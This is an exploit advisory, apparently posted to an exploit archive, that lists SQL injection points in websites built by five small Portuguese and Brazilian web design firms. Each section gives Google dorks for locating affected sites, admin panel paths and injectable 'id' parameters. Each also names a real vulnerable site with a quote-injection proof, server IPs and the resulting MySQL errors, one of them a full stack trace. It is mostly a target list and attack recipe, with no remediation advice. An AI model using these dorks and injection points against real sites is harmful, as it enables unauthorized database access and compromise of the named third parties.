######################################################################################
# Exploit Title : C3iM * HiperwebBrasil * HumbertoCaldas * Vale Mais Comunicação * Webproj Web Designs SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepages :
c3im.pt - hiperwebbrasil.com.br - humbertocaldas.com - valemais.net - webproj.com.br
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
*****************************************************************************
There are 5 vendors that their products suffer from remote SQL Injection Vulnerabilities
Table of Contents ;
1) Desenvolvido C3iM Portugal Web Design SQL Injection Vulnerability => [ Vendor ] => c3im.pt
2) HiperwebBrasil Web Design SQL Injection Vulnerability => [ Vendor ] => hiperwebbrasil.com.br
3) HumbertoCaldas Web Design SQL Injection Vulnerability => [ Vendor ] =>humbertocaldas.com
4) Vale Mais Comunicação Web Design SQL Injection Vulnerability => [ Vendor ] => valemais.net
5) Webproj Brazil Web Design SQL Injection Vulnerability => [ Vendor ] => webproj.com.br
*****************************************************************************
# Google Dorks :
intext:''Desenvolvido C3iM'' site:pt
intext:''Hiperweb Brasil'' site:br
intext:''Site by Humberto Caldas"
intext:''Desenvolvido por Vale Mais Comunicação''
intext:''Desenvolvido por Webproj'' site:br
***********************************************************************************
######################################################################################
# Exploit Title : Desenvolvido C3iM Portugal SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : c3im.pt
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desenvolvido C3iM'' site:pt
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
######################################################################################
# Admin Panel Login Path :
*************************
/admin
# SQL Injection Exploit :
***********************
/associados_id.php?id=[SQL Injection]
/conteudo.php?id=[SQL Injection]
/new.php?id=[SQL Injection]
/content.php?id=[SQL Injection]
/event.php?id=[SQL Injection]
/noticia.php?id=[SQL Injection]
######################################################################################
# Example Vulnerable Site :
*************************
[+] danotec.pt/conteudo.php?id=1%27 =>
[ Proof of Concept ] => archive.is/BcJYk
Note : (192.185.106.107) => There are 104 domains hosted on this server.
Note : (192.185.86.89) => There are 174 domains hosted on this server.
######################################################################################
# SQL Database Error :
**********************
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for
the right syntax to use near '\'' at line 1
********************************************************************
######################################################################################
# Exploit Title : HiperwebBrasil SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : hiperwebbrasil.com.br - twitter.com/Hiperweb
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Hiperweb Brasil'' site:br
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
######################################################################################
# Admin Panel Login Path :
*************************
/admin/
# SQL Injection Exploit :
***********************
/noticias.php?id=[SQL Injection]
/conc_encontre.php?id=[SQL Injection]
######################################################################################
# Example Vulnerable Site :
*************************
[+] sincodiv-rj.com.br/noticias.php?id=67%27 =>
[ Proof of Concept ] => archive.is/DqTlc
Note => (177.70.106.69) => There are 186 domains hosted on this server.
######################################################################################
# SQL Database Error :
**********************
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for
the right syntax to use near ''67''' at line 1
*******************************************************************
######################################################################################
# Exploit Title : HumbertoCaldas SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : humbertocaldas.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Site by Humberto Caldas"
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
######################################################################################
# Admin Panel Login Path :
*************************
/admin
# SQL Injection Exploit :
***********************
/noticia.php?id=[SQL Injection]
/galeria_id.php?id=[SQL Injection]
######################################################################################
# Example Vulnerable Site :
*************************
[+] indoorpadelcenter.pt/noticia.php?id=14%27 =>
[ Proof of Concept ] => archive.is/xSKcq
######################################################################################
# SQL Database Error :
**********************
You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for
the right syntax to use near '\'' at line 1
**********************************************************************
######################################################################################
# Exploit Title : Vale Mais Comunicação SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : valemais.net
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desenvolvido por Vale Mais Comunicação''
intext:''© 2008-2013 | www.valemais.net''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
######################################################################################
# Admin Panel Login Path :
*************************
/admin/
# SQL Injection Exploit :
***********************
/projeto.php?id=[SQL Injection]
/noticias.php?id=[SQL Injection]
/produto.php?cat=[SQL Injection]
/produto.php?cat=[ID-NUMBER]&gr=&id=[SQL Injection]
######################################################################################
# Example Vulnerable Site :
*************************
[+] clam.ind.br/projeto.php?id=2%27 =>
[ Proof of Concept ] => archive.is/niemC
Note : (187.17.111.100) => There are 8,650 domains hosted on this server.
######################################################################################
# SQL Database Error :
**********************
Fatal error: Uncaught exception 'Exception' with message 'MySQL:
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near ''2'' ORDER BY
codigo ASC' at line 1' in /var/www/html/clam.ind.br/web/beam/system
/Connection.class.php:110 Stack trace: #0 /var/www/html/clam.ind.br/web
/beam/system/Connection.class.php(83): Connection->throwSqlError() #1
/var/www/html/clam.ind.br/web/beam/system/Beam.class.php(134):
Connection->query('SELECT * FROM s...') #2 /var/www/html/clam.ind.br
/web/beam/system/Beam.class.php(131): Beam->fetchSelect('SELECT *
FROM s...') #3 /var/www/html/clam.ind.br/web/beam/system/Beam.class.php
(181): Beam->buscar('SELECT * FROM s...') #4 /var/www/html/clam.ind.br
/web/beam/system/Beam.class.php(128): Beam->buscarTabela('', -1, 1, 'ASC',
'codigo = '2''') #5 /var/www/html/clam.ind.br/web/beam/system/Beam.class.php
(150): Beam->buscar('codigo = '2''') #6 /var/www/html/clam.ind.br/web
/projeto.php(8): Beam->buscarChave('2'') #7 {main} thro in /var/www
/html/clam.ind.br/web/beam/system/Connection.class.php on line 110
*********************************************************************
######################################################################################
# Exploit Title : Webproj Brazil SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : webproj.com.br
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desenvolvido por Webproj'' site:br
intext:''Criação de sites Porto Alegre''
intext:''Criação de loja virtual Porto Alegre''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
######################################################################################
# Admin Panel Login Path :
*************************
/admin
# SQL Injection Exploit :
***********************
/noticias.php?id=[SQL Injection]
######################################################################################
# Example Vulnerable Site :
*************************
[+] corpoacao.com.br/noticias.php?id=61%27 =>
[ Proof of Concept ] => archive.is/Ym4qv
Note : (191.252.132.249) => There are 18 domains hosted on this server.
Note : (35.211.91.136) => There are 6 domains hosted on this server.
######################################################################################
# SQL Database Error :
**********************
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for
the right syntax to use near ''61''' at line 1
######################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
######################################################################################